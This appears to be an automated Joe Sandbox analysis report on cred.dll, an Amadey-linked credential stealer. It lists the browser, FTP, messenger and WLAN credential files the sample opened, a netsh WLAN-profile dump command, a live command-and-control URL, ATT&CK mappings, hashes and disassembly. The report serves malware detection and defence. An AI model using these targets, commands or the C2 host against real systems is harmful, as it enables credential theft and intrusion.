    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.IO.Compression\v4.0_4.0.0.0__b77a5c561934e089\System.IO.Compression.dll VolumeInformationJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.IO.Compression.FileSystem\v4.0_4.0.0.0__b77a5c561934e089\System.IO.Compression.FileSystem.dll VolumeInformationJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation

    Lowering of HIPS / PFW / Operating System Security Settings

    Source: C:\Windows\SysWOW64\rundll32.exe | Process created: C:\Windows\SysWOW64\netsh.exe netsh wlan show profiles

    Stealing of Sensitive Information

    Source: Yara match | File source: cred.dll, type: SAMPLE
    Source: C:\Windows\SysWOW64\rundll32.exe | Process created: C:\Windows\SysWOW64\netsh.exe netsh wlan show profiles
    Source: C:\Windows\SysWOW64\rundll32.exe | File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\logins.json
    Source: C:\Windows\SysWOW64\rundll32.exe | File opened: C:\Users\user\AppData\Local\Orbitum\User Data\Default\Login Data
    Source: C:\Windows\SysWOW64\rundll32.exe | File opened: C:\Users\user\AppData\Local\Vivaldi\User Data\Default\Login Data
    Source: C:\Windows\SysWOW64\rundll32.exe | File opened: C:\Users\user\AppData\Local\Comodo\Dragon\User Data\Default\Login Data
    Source: C:\Windows\SysWOW64\rundll32.exe | File opened: C:\Users\user\AppData\Roaming\Opera Software\Opera Stable\Login Data
    Source: C:\Windows\SysWOW64\rundll32.exe | File opened: C:\Users\user\AppData\Local\CocCoc\Browser\User Data\Default\Login Data
    Source: C:\Windows\SysWOW64\rundll32.exe | File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data
    Source: C:\Windows\SysWOW64\rundll32.exe | File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\24a4ohrz.default-release\logins.json
    Source: C:\Windows\SysWOW64\rundll32.exe | File opened: C:\Users\user\AppData\Local\CentBrowser\User Data\Default\Login Data
    Source: C:\Windows\SysWOW64\rundll32.exe | File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\kz8kl7vh.default\logins.json
    Source: C:\Windows\SysWOW64\rundll32.exe | File opened: C:\Users\user\AppData\Local\Chromium\User Data\Default\Login Data
    Source: C:\Windows\SysWOW64\rundll32.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
    Source: C:\Windows\SysWOW64\rundll32.exe | File opened: C:\Users\user\AppData\Local\Chedot\User Data\Default\Login Data
    Source: C:\Windows\SysWOW64\rundll32.exe | File opened: C:\Users\user\AppData\Roaming\FileZilla\sitemanager.xml
    Source: C:\Windows\SysWOW64\rundll32.exe | File opened: C:\Users\user\AppData\Roaming\.purple\accounts.xml
    Source: C:\Windows\SysWOW64\rundll32.exe | File opened: C:\.purple\accounts.xml
    Source: C:\Windows\SysWOW64\rundll32.exe | File opened: C:\Windows\SysWOW64\.purple\accounts.xml
    Source: C:\Windows\SysWOW64\rundll32.exe | File opened: C:\Windows\.purple\accounts.xml
    Source: C:\Windows\SysWOW64\rundll32.exe | File opened: C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\.purple\accounts.xml
    Source: C:\Windows\SysWOW64\rundll32.exe | File opened: C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\.purple\accounts.xml
    Source: C:\Windows\SysWOW64\rundll32.exe | File opened: C:\Program Files\WindowsApps\Microsoft.WindowsStore_11910.1002.5.0_x64__8wekyb3d8bbwe\.purple\accounts.xml
    Source: C:\Windows\SysWOW64\rundll32.exe | File opened: C:\Windows\SystemApps\MicrosoftWindows.Client.CBS_cw5n1h2txyewy\.purple\accounts.xml
    Source: C:\Windows\SysWOW64\rundll32.exe | File opened: C:\Windows\ImmersiveControlPanel\.purple\accounts.xml
    Source: C:\Windows\SysWOW64\rundll32.exe | File opened: C:\Program Files (x86)\awAqlPMQmFjrwTTavmOVTRjaCXftDjcPubdBaHVFMxAPsKNvggU\.purple\accounts.xml
    Source: C:\Windows\SysWOW64\rundll32.exe | File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\.purple\accounts.xml
    MITRE ATT&CK Matrix (a number before a technique is the report's count of matching signatures for that technique)

    Reconnaissance: Gather Victim Identity Information; Credentials; Email Addresses; Employee Names; Gather Victim Network Information; Domain Properties
    Resource Development: Acquire Infrastructure; Domains; DNS Server; Virtual Private Server; Server; Botnet
    Initial Access: Valid Accounts; Default Accounts; Domain Accounts; Local Accounts; Cloud Accounts; Replication Through Removable Media
    Execution: Windows Management Instrumentation; Scheduled Task/Job; At; Cron; Launchd; Scheduled Task
    Persistence: 1 DLL Side-Loading; Boot or Logon Initialization Scripts; Logon Script (Windows); Login Hook; Network Logon Script; RC Scripts
    Privilege Escalation: 111 Process Injection; 1 DLL Side-Loading; Logon Script (Windows); Login Hook; Network Logon Script; RC Scripts
    Defense Evasion: 1 Disable or Modify Tools; 21 Virtualization/Sandbox Evasion; 111 Process Injection; 1 Obfuscated Files or Information; 1 Rundll32; 1 DLL Side-Loading
    Credential Access: 2 OS Credential Dumping; 1 Credentials in Registry; 1 Credentials In Files; NTDS; LSA Secrets; Cached Domain Credentials
    Discovery: 1 Security Software Discovery; 1 Process Discovery; 21 Virtualization/Sandbox Evasion; 1 Application Window Discovery; 2 File and Directory Discovery; 13 System Information Discovery
    Lateral Movement: Remote Services; Remote Desktop Protocol; SMB/Windows Admin Shares; Distributed Component Object Model; SSH; VNC
    Collection: 1 Archive Collected Data; 2 Data from Local System; Data from Network Shared Drive; Input Capture; Keylogging; GUI Input Capture
    Command and Control: 1 Encrypted Channel; 1 Non-Application Layer Protocol; 11 Application Layer Protocol; Protocol Impersonation; Fallback Channels; Multiband Communication
    Exfiltration: Exfiltration Over Other Network Medium; Exfiltration Over Bluetooth; Automated Exfiltration; Traffic Duplication; Scheduled Transfer; Data Transfer Size Limits
    Impact: Abuse Accessibility Features; Network Denial of Service; Data Encrypted for Impact; Data Destruction; Data Encrypted for Impact; Service Stop

    Legend:

    • Process
    • Signature
    • Created File
    • DNS/IP Info
    • Is Dropped
    • Is Windows Process
    • Number of created Registry Values
    • Number of created Files
    • Visual Basic
    • Delphi
    • Java
    • .Net C# or VB.NET
    • C, C++ or other language
    • Is malicious
    • Internet
    Behavior Graph ID: 1620561, Sample: cred.dll, Start date: 21/02/2025, Architecture: WINDOWS, Score: 100
    Signatures on the sample: Suricata IDS alerts for network traffic; Found malware configuration; Malicious sample detected (through community Yara rule); 8 other signatures
    Process tree:
    • loaddll32.exe 1
      • rundll32.exe 29: System process connects to network (likely due to code injection or exploit); Tries to steal Instant Messenger accounts or passwords; Tries to harvest and steal ftp login credentials; Tries to harvest and steal browser information (history, passwords, etc)
        • powershell.exe -> conhost.exe
        • netsh.exe -> conhost.exe
      • rundll32.exe 26: Uses netsh to modify the Windows network and firewall settings; Tries to harvest and steal WLAN passwords
        • powershell.exe 26: Loading BitLocker PowerShell Module; dropped C:\Users\user\...\246122658369_Desktop.zip (Zip) -> conhost.exe
        • netsh.exe 2 -> conhost.exe
      • cmd.exe 1
        • rundll32.exe 28: connects to 185.196.8.37 (ports 49706, 49707, 49708; SIMPLECARRER2IT, Switzerland); Tries to steal Instant Messenger accounts or passwords; Tries to harvest and steal WLAN passwords
          • powershell.exe: Loading BitLocker PowerShell Module -> conhost.exe
          • netsh.exe 2 -> conhost.exe
      • 3 other processes

    Source | Detection | Scanner | Label
    cred.dll | 76% | ReversingLabs | Win32.Spyware.Multiverze
    cred.dll | 82% | Virustotal |
    No Antivirus matches
    Source | Detection | Scanner | Label
    http://185.196.8.37/Gd85kkjf/index.php | 100% | Avira URL Cloud | malware
    http://185.196.8.37/=1 | 0% | Avira URL Cloud | safe
    http://185.196.8.37/Gd85kkjf/index.php?wal=1/ | 100% | Avira URL Cloud | malware
    http://185.196.8.37/Gd85kkjf/index.php?wal=13 | 100% | Avira URL Cloud | malware
    http://185.196.8.37/Gd85kkjf/index.php?wal=1E | 100% | Avira URL Cloud | malware
    http://185.196.8.37/-A2D8-08002B30309D | 0% | Avira URL Cloud | safe
    http://185.196.8.37/Gd85kkjf/index.php?wal=1 | 100% | Avira URL Cloud | malware
    http://185.196.8.37/Gd85kkjf/index.php?wal=1yq | 100% | Avira URL Cloud | malware
    http://185.196.8.37/ | 0% | Avira URL Cloud | safe
    http://185.196.8.37/Gd85kkjf/index.php?wal=13l | 100% | Avira URL Cloud | malware
    http://185.196.8.37/Gd85kkjf/index.php%q | 0% | Avira URL Cloud | safe
    No contacted domains info
    Name | Malicious | Antivirus Detection | Reputation
    http://185.196.8.37/Gd85kkjf/index.php | true | Avira URL Cloud: malware | unknown
    http://185.196.8.37/Gd85kkjf/index.php?wal=1 | true | Avira URL Cloud: malware | unknown
    Name | Source (process whose memory dump contained the string) | Malicious | Antivirus Detection | Reputation
    http://nuget.org/NuGet.exe | powershell.exe | false | | high
    https://aka.ms/winsvr-2022-pshelp | powershell.exe | false | | high
    http://pesterbdd.com/images/Pester.png | powershell.exe | false | | high
    http://schemas.xmlsoap.org/soap/encoding/ | powershell.exe | false | | high
    http://www.apache.org/licenses/LICENSE-2.0.html | powershell.exe | false | | high
    http://www.microsoft.co | powershell.exe | false | | high
    https://contoso.com/License | powershell.exe | false | | high
    http://185.196.8.37/-A2D8-08002B30309D | rundll32.exe | false | Avira URL Cloud: safe | unknown
    https://contoso.com/Icon | powershell.exe | false | | high
    https://aka.ms/winsvr-2022-pshelpX | powershell.exe | false | | high
    http://www.microsoft. | powershell.exe | false | | high
    http://185.196.8.37/=1 | rundll32.exe | false | Avira URL Cloud: safe | unknown
    http://185.196.8.37/Gd85kkjf/index.php?wal=1E | rundll32.exe | true | Avira URL Cloud: malware | unknown
    https://github.com/Pester/Pester | powershell.exe | false | | high
    http://185.196.8.37/Gd85kkjf/index.php?wal=1/ | rundll32.exe | true | Avira URL Cloud: malware | unknown
    http://crl.m | powershell.exe | false | | high
    http://185.196.8.37/Gd85kkjf/index.php?wal=13 | rundll32.exe | true | Avira URL Cloud: malware | unknown
    http://schemas.xmlsoap.org/wsdl/ | powershell.exe | false | | high
    https://contoso.com/ | powershell.exe | false | | high
    https://nuget.org/nuget.exe | powershell.exe | false | | high
    http://185.196.8.37/Gd85kkjf/index.php?wal=1yq | rundll32.exe | true | Avira URL Cloud: malware | unknown
    https://aka.ms/pscore68 | powershell.exe | false | | high
    http://185.196.8.37/Gd85kkjf/index.php?wal=13l | rundll32.exe | true | Avira URL Cloud: malware | unknown
    http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name | powershell.exe | false | | high
    http://185.196.8.37/ | rundll32.exe | false | Avira URL Cloud: safe | unknown
    http://185.196.8.37/Gd85kkjf/index.php%q | rundll32.exe | true | Avira URL Cloud: safe | unknown
    IP | Domain | Country | ASN | ASN Name | Malicious
    185.196.8.37 | unknown | Switzerland | 34888 | SIMPLECARRER2IT | true
                                      Joe Sandbox version:42.0.0 Malachite
                                      Analysis ID:1620561
                                      Start date and time:2025-02-21 01:52:34 +01:00
                                      Joe Sandbox product:CloudBasic
                                      Overall analysis duration:0h 5m 36s
                                      Hypervisor based Inspection enabled:false
                                      Report type:full
                                      Cookbook file name:default.jbs
                                      Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
    Number of new started processes analysed:26
                                      Number of new started drivers analysed:0
                                      Number of existing processes analysed:0
                                      Number of existing drivers analysed:0
                                      Number of injected processes analysed:0
                                      Technologies:
                                      • HCA enabled
                                      • EGA enabled
                                      • AMSI enabled
                                      Analysis Mode:default
                                      Analysis stop reason:Timeout
                                      Sample name:cred.dll
                                      Detection:MAL
                                      Classification:mal100.phis.troj.spyw.evad.winDLL@32/22@0/1
                                      EGA Information:Failed
                                      HCA Information:
                                      • Successful, ratio: 88%
                                      • Number of executed functions: 13
                                      • Number of non-executed functions: 3
                                      Cookbook Comments:
                                      • Found application associated with file extension: .dll
                                      • Exclude process from analysis (whitelisted): MpCmdRun.exe, dllhost.exe, WMIADAP.exe, SIHClient.exe, conhost.exe
                                      • Excluded IPs from analysis (whitelisted): 52.149.20.212, 23.206.229.226, 20.12.23.50
                                      • Excluded domains from analysis (whitelisted): www.bing.com, ocsp.digicert.com, slscr.update.microsoft.com, fe3cr.delivery.mp.microsoft.com
                                      • Execution Graph export aborted for target powershell.exe, PID 8008 because it is empty
    • Not all processes were analyzed, report is missing behavior information
                                      • Report size exceeded maximum capacity and may have missing behavior information.
                                      • Report size getting too big, too many NtCreateKey calls found.
                                      • Report size getting too big, too many NtEnumerateKey calls found.
                                      • Report size getting too big, too many NtOpenKeyEx calls found.
                                      • Report size getting too big, too many NtProtectVirtualMemory calls found.
                                      • Report size getting too big, too many NtQueryValueKey calls found.
                                      • Some HTTP raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
    Time | Type | Description
    19:53:34 | API Interceptor | 69x Sleep call for process: powershell.exe modified
    19:53:35 | API Interceptor | 1x Sleep call for process: loaddll32.exe modified
    Match | Associated Sample Name / URL | Detection | Threat Name | Context
    185.196.8.37 | clip64.dll | malicious | Amadey | 185.196.8.37/Gd85kkjf/index.php
    185.196.8.37 | cred64.dll.dll | malicious | Amadey | 185.196.8.37/Gd85kkjf/index.php?wal=1
    185.196.8.37 | qzpTLn4c4B.exe | malicious | Amadey | 185.196.8.37/Gd85kkjf/index.php
                                      No context
    Match | Associated Sample Name / URL | Detection | Threat Name | Context
    SIMPLECARRER2IT | clip64.dll | malicious | Amadey | 185.196.8.37
    SIMPLECARRER2IT | cred64.dll.dll | malicious | Amadey | 185.196.8.37
    SIMPLECARRER2IT | cpainject.txt.ps1 | malicious | PureLog Stealer, RHADAMANTHYS, zgRAT | 185.208.159.170
    SIMPLECARRER2IT | Th2M2e7ZfY.exe | malicious | Quasar | 185.208.159.150
    SIMPLECARRER2IT | https://steamescommnunity.com/s/10429109537 | malicious | Unknown | 185.208.158.242
    SIMPLECARRER2IT | https://steamecomrmunity.com/s/10423910953 | malicious | Unknown | 185.208.158.242
    SIMPLECARRER2IT | http://account.turnkeycashsite.com/ | malicious | Unknown | 185.208.159.7
    SIMPLECARRER2IT | BUDDA.exe | malicious | Unknown | 185.196.8.253
    SIMPLECARRER2IT | selavi.exe | malicious | Unknown | 185.196.8.253
    SIMPLECARRER2IT | wow.exe | malicious | Amadey, GhostRat, GuLoader, LummaC Stealer, XWorm, Xmrig | 185.196.8.34
    No context
                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                      File Type:data
                                      Category:dropped
                                      Size (bytes):64
                                      Entropy (8bit):1.0818136700495735
                                      Encrypted:false
                                      SSDEEP:3:Nlllulm/Z:NllU
                                      MD5:CB6303B568C5D1E33D8AB77A017C0164
                                      SHA1:6EF7B7E51377EBF9AF1A48440F50243E3FEA49DC
                                      SHA-256:9E4E6BA31CE95F4AD93AB03E57A80DCD0B4268CB90A81A6310A9ADCC8DB6B544
                                      SHA-512:8C582195E9F51AD71B6D6EB857073B2DB9DC8E1ECCB66E368A7052F3C7FD2ED2DC27470074BBDD07453AE77D0792BC704534AD04309B0B1E689B47200BAE28D4
                                      Malicious:false
                                      Preview:@...e...............................4................@..........
                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                      File Type:Zip archive data, at least v2.0 to extract, compression method=deflate
                                      Category:dropped
                                      Size (bytes):6143
                                      Entropy (8bit):7.80371186180881
                                      Encrypted:false
                                      SSDEEP:96:rW0S8j36k9i2BVqn8iUFdBVqn8iUFHCw3PCw3oxAijeV65jMOLPPGxQfMpK+:CU/0X6Fc6FHF+xAi7vPwQO
                                      MD5:840B2E3EC384E55DA22C12913BF8BA48
                                      SHA1:7649C84CF2EAAF02AFDDF6CBAFC783989F4F2BE9
                                      SHA-256:BFEBAE1C7389655162C7011A5206297675B57D72A8B020707B6C5E69DCDC15CA
                                      SHA-512:B719C02428C7899337D16F6358F30AD9AD0C3E872CB68A93B2C5596C20C4240FD89BB91E0A7D3364698ABDA236CF53BF83A1D05733B9DE10D9B6EE4EA072947A
                                      Malicious:true
                                      Preview:PK.........$EW..d)............_Files_\GAOBCVIQIJ.xlsx...E1.E.#...9`....!.. t..AE...h`...RXj...s~\......f.mv.v#.-U...;..yy..%....n(.d>........p......e.1....JG.65o..AK.B.y.)g.DJ..7..|......{......,JU]FX.P0n-...r.. .A.].e.J..3.l[.....N.{..v....T...8....\M.,..?...yc...[X.f.So....?8....R.C.x..q.V.....A.K...eW.9z.6W..U2.4Z-.|.G.J.n5.t.P..&..."..d>[.l..O.<..&..[.T..G...Fur..;_....g...8.'...%C....z.....SaS>.......p..<.m...!..M.'/.....k7.3.t.~...;...:.K..Zv4..s[.^x.;.e.Gg..}.C7......;..7.K.Zn...};.n......f..1$.f}.X9.G2f.`..=a.`....RT9.......t...W.Ng..:.~DT..'|..:.......x..........C.Y..y.T....,>...T\....I...S...R.q9g.q+IM.o...J..il.>.F.s....S...}D..=./.S..k....?PK.........$EW,.............._Files_\IPKGELNTQY.docx..In.1....(c.}.........T...........(.k.h....$.$...[..Z.u[RLbK1A.v..l.ae{m=3RPLR..n.....I..b...,.)........K... O..2;...;.5.+G..V.QP...3.+b....=..+..^.TM.z...4...^...V...9.f.v.,.WW... .3."....28D.E......;.4...&.j......q.z..k.d....
                                      Process:C:\Windows\SysWOW64\rundll32.exe
                                      File Type:ASCII text, with very long lines (1024), with CRLF line terminators
                                      Category:dropped
                                      Size (bytes):1026
                                      Entropy (8bit):4.701188456968639
                                      Encrypted:false
                                      SSDEEP:24:hm3LKgBsTCBI602KGM6Fnd0F02s0LTz4+A7wXBjb9gPY14fmfdBH159l7TZzRQTJ:4mg9IFPGM6OtPc++wXBbV14e71zwv
                                      MD5:18A3248DC9C539CCD2C8419D200F1C4D
                                      SHA1:3B2CEE87F3426C4A08959E9861D274663420215C
                                      SHA-256:27D6BAB3FFA19534FF008BDBC5FF07BE94BA08C909222D5AD4802C4C9E10153E
                                      SHA-512:F8176C814016D4962693A55A84D2BCC26EE01DE822E76B3D3A6B0ADD48382F8D76B5576742BBCAD16A7779C602B435150C0EBDDE1B1ECBFFD6702ECEFE87133B
                                      Malicious:false
                                      Process:C:\Windows\SysWOW64\rundll32.exe
                                      File Type:ASCII text, with very long lines (1024), with CRLF line terminators
                                      Category:dropped
                                      Size (bytes):1026
                                      Entropy (8bit):4.695505889681456
                                      Encrypted:false
                                      SSDEEP:24:H4n3oQ37aNEo3/q02YbYK7OUQV8AZfGyzIie/8sE4StAYwrHEJyput:lQLaNh/qYnqUQ5ZeyMt1PTYYE7t
                                      MD5:3E1BF32E65136B415337727A75BB2991
                                      SHA1:4754D2DD51AEC8E287F0F298F5A81349578DEB56
                                      SHA-256:448E0EE938A14EF0F54CD6AAA94E2AA58F26558AAEF43BCC1C7F6FE9C603AE3C
                                      SHA-512:16F40CD1EDF14D55FACB7B9F180AB3C15C32ED4D80F8A9BAC35B1206A90AA9020D775CDA79F373207172538F23A3B52CE68AFFDFC8AC0F201DBF66D161324959
                                      Malicious:false
                                      Process:C:\Windows\SysWOW64\rundll32.exe
                                      File Type:ASCII text, with very long lines (1024), with CRLF line terminators
                                      Category:dropped
                                      Size (bytes):1026
                                      Entropy (8bit):4.698193102830694
                                      Encrypted:false
                                      SSDEEP:24:KhE228cmFkr20OAjI3miuGa+rJj0c5MpHs17/w:KhLpN0OAjI3mjGaSN0c5oqzw
                                      MD5:78472D7E4F5450A7EA86F47D75E55F39
                                      SHA1:D107CE158C547BA6E7FBA95479B375AA3E5A9DA9
                                      SHA-256:2E1C76361DFADCE9DB785153CC20DB121B8667BE1554EB59258F8B4507170147
                                      SHA-512:D556587AF39CFD879A7D698B11DC51C7B733CC7C971EBE165A0A238B623BE60EB4979101E6B167EE4D25578DE2CAEBE85063AF01C1E94F56A0E3DE811D2454FD
                                      Malicious:false
                                      Process:C:\Windows\SysWOW64\rundll32.exe
                                      File Type:ASCII text, with very long lines (1024), with CRLF line terminators
                                      Category:dropped
                                      Size (bytes):1026
                                      Entropy (8bit):4.692704155467908
                                      Encrypted:false
                                      SSDEEP:24:zrCxfe2LWgi+vQ2TVmOkCRMqftTB+IkHJMBxmT+gmPrwxYu:zSLpN5mOhMq1NUHCLm0Mx/
                                      MD5:D0B81B6D51E4EDDB3769BCE2A5F1538F
                                      SHA1:08D04E7E91BD584CC92DB2586E3752A6E50FF2A7
                                      SHA-256:18CE24DD08DD5F5AC0F5CECA3D6551DFDBBD4893A4A9A9A9331E8ADB67061A33
                                      SHA-512:CB9E881EE3E57B79597C4AD35D24CBF490882CAB222FD687E52B01798E643876D97A51BE67CBB9AC8CD21EAEC8383FF822569E8E523B165607D328FC53E97B80
                                      Malicious:false
                                      Process:C:\Windows\SysWOW64\rundll32.exe
                                      File Type:ASCII text, with very long lines (1024), with CRLF line terminators
                                      Category:dropped
                                      Size (bytes):1026
                                      Entropy (8bit):4.702247102869977
                                      Encrypted:false
                                      SSDEEP:24:GwASqxXUeo2spEcwb4NnVEBb2Ag1EY9TDqVEQXZvnIx+:nAD1U6+Lwb4dV42x1EIeVlXZ/5
                                      MD5:B734D7226D90E4FD8228EE89C7DD26DA
                                      SHA1:EDA7F371036A56A0DE687FF97B01F355C5060846
                                      SHA-256:ED3AE18072D12A2B031864F502B3DA672B4D4FA8743BEC8ADE114460F53C24D6
                                      SHA-512:D11ED908D0473A6BEA78D56D0E46FC05DAE642C6ED2F6D60F7859BB25C596CDAA79CC7883FEA5C175A2C04BD176943FF45670B19D6A55B3D5F29FAF40A19AC20
                                      Malicious:false
                                      Process:C:\Windows\SysWOW64\rundll32.exe
                                      File Type:ASCII text, with very long lines (1024), with CRLF line terminators
                                      Category:dropped
                                      Size (bytes):1026
                                      Entropy (8bit):4.696913287597031
                                      Encrypted:false
                                      SSDEEP:24:TEp0dGAR5tKV4V1dnQcncjGi20QoVwGQqh3:20Iw5tKOncjGUwra
                                      MD5:44ECF9E98785299129B35CBDBCAB909B
                                      SHA1:4D92AFB00FE614CC8B795F1AF28173DBE76FE7F5
                                      SHA-256:06E706536CB7D543E6068C98C90721CAD89C23D16D37444F46F9B01C4380DF9E
                                      SHA-512:1FA347223014BB3AC0106948B07E337B1A98C0BA2D98AC0ADD821D1B3CE9F75681F6383925F5E614F36750C5B9FB92D1C8EEEDC05469FBC6EA3F281D8B52B556
                                      Malicious:false
                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                      File Type:ASCII text, with no line terminators
                                      Category:dropped
                                      Size (bytes):60
                                      Entropy (8bit):4.038920595031593
                                      Encrypted:false
                                      SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                      MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                      SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                      SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                      SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                      Malicious:false
                                      Preview:# PowerShell test file to determine AppLocker lockdown mode
                                      File type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                      Entropy (8bit):6.685760265414563
                                      TrID:
                                      • Win32 Dynamic Link Library (generic) (1002004/3) 99.60%
                                      • Generic Win/DOS Executable (2004/3) 0.20%
                                      • DOS Executable Generic (2002/1) 0.20%
                                      • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                      File name:cred.dll
                                      File size:1'087'488 bytes
                                      MD5:fd8df0fc2168cb8c7959afaffa4d8031
                                      SHA1:1715f77ca9c2d09d3fbbd5e42ae506be4157d961
                                      SHA256:50f6ef79d5f5ba167a875bbf1438b8ff42a46ac5537127bb5a51f87bdc611620
                                      SHA512:4a856f62f1c1a63457c4c114f9141c2ddc626c3c63e40dbac3053052dd23578e7c8abcff63195e30d5c5e7d336b4ce256a8ed56b516b2ca2052be5dd292f4c24
                                      SSDEEP:24576:QWBhVxYlZdJCTgmP/xEcCJnDOEl5woFNEa1mXu5iPajrVT1jH:QWBhPYrpoCpmX2pjXjH
                                      TLSH:E6357D06FA52D071D8D420B112B7BBF2597C6539A72445DBAB801FB69D201F33E36B2E
                                      File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......P.hv...%...%...%...$...%...$...%...$...%F..$V..%F..$...%F..$...%...$...%...%...%...$...%...$...%...%...%...$...%Rich...%.......
                                      Icon Hash:7ae282899bbab082
                                      Entrypoint:0x100bfd9d
                                      Entrypoint Section:.text
                                      Digitally signed:false
                                      Imagebase:0x10000000
                                      Subsystem:windows gui
                                      Image File Characteristics:EXECUTABLE_IMAGE, 32BIT_MACHINE, DLL
                                      DLL Characteristics:DYNAMIC_BASE, NX_COMPAT
                                      Time Stamp:0x6750AA7C [Wed Dec 4 19:16:12 2024 UTC]
                                      TLS Callbacks:
                                      CLR (.Net) Version:
                                      OS Version Major:6
                                      OS Version Minor:0
                                      File Version Major:6
                                      File Version Minor:0
                                      Subsystem Version Major:6
                                      Subsystem Version Minor:0
                                      Import Hash:aca6f08ee5befa37be16bac4bc315573
                                      Instruction
                                      push ebp
                                      mov ebp, esp
                                      cmp dword ptr [ebp+0Ch], 01h
                                      jne 00007F8EBC8C75D7h
                                      call 00007F8EBC8C79BCh
                                      push dword ptr [ebp+10h]
                                      push dword ptr [ebp+0Ch]
                                      push dword ptr [ebp+08h]
                                      call 00007F8EBC8C7483h
                                      add esp, 0Ch
                                      pop ebp
                                      retn 000Ch
                                      and dword ptr [ecx+04h], 00000000h
                                      mov eax, ecx
                                      and dword ptr [ecx+08h], 00000000h
                                      mov dword ptr [ecx+04h], 100E758Ch
                                      mov dword ptr [ecx], 100E7584h
                                      ret
                                      push ebp
                                      mov ebp, esp
                                      sub esp, 0Ch
                                      lea ecx, dword ptr [ebp-0Ch]
                                      call 00007F8EBC8C75AFh
                                      push 100FF94Ch
                                      lea eax, dword ptr [ebp-0Ch]
                                      push eax
                                      call 00007F8EBC8C93EFh
                                      int3
                                      push ebp
                                      mov ebp, esp
                                      and dword ptr [10105024h], 00000000h
                                      sub esp, 24h
                                      or dword ptr [1010200Ch], 01h
                                      push 0000000Ah
                                      call dword ptr [100E7200h]
                                      test eax, eax
                                      je 00007F8EBC8C777Fh
                                      and dword ptr [ebp-10h], 00000000h
                                      xor eax, eax
                                      push ebx
                                      push esi
                                      push edi
                                      xor ecx, ecx
                                      lea edi, dword ptr [ebp-24h]
                                      push ebx
                                      cpuid
                                      mov esi, ebx
                                      pop ebx
                                      mov dword ptr [edi], eax
                                      mov dword ptr [edi+04h], esi
                                      mov dword ptr [edi+08h], ecx
                                      xor ecx, ecx
                                      mov dword ptr [edi+0Ch], edx
                                      mov eax, dword ptr [ebp-24h]
                                      mov edi, dword ptr [ebp-1Ch]
                                      mov dword ptr [ebp-0Ch], eax
                                      xor edi, 6C65746Eh
                                      mov eax, dword ptr [ebp-18h]
                                      xor eax, 49656E69h
                                      mov dword ptr [ebp-08h], eax
                                      mov eax, dword ptr [ebp-20h]
                                      xor eax, 756E6547h
                                      mov dword ptr [ebp-04h], eax
                                      xor eax, eax
                                      inc eax
                                      push ebx
                                      cpuid
Name                                  Virtual Address  Virtual Size  Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT          0x1002b0         0x58          .rdata
IMAGE_DIRECTORY_ENTRY_IMPORT          0x100308         0x8c          .rdata
IMAGE_DIRECTORY_ENTRY_RESOURCE        0x10b000         0xf8          .rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION       0x0              0x0
IMAGE_DIRECTORY_ENTRY_SECURITY        0x0              0x0
IMAGE_DIRECTORY_ENTRY_BASERELOC       0x10c000         0x6690        .reloc
IMAGE_DIRECTORY_ENTRY_DEBUG           0xfe220          0x38          .rdata
IMAGE_DIRECTORY_ENTRY_COPYRIGHT       0x0              0x0
